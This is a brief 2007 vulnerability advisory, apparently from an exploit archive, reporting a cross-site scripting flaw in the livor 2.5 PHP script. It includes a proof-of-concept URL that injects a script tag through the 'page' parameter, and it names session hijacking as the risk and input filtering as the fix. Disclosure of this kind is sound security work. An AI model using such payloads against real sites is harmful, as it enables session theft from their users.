Home / os / winme

livor-xss.txt

Posted on 08 April 2007

/* livor 2.5 Cross-Site Scripting Vulnerability */ //Author: Arham Muhammad //Source: http://www.arizona-dream.com/Usa/Divers/scriptsphp/scripts/livor.zip //Vulnerable File: index.php //XsS: http://victim/path/index.php?page=//</script><script>alert(/xss/);</script> //Risk: Session Hijack //Fix: The Variable "page" Need To Be Properly Filtered To Avoid Cross-Site Scripting Attempt! //Greets: USMAN,tushy,Hackman,str0ke

 

TOP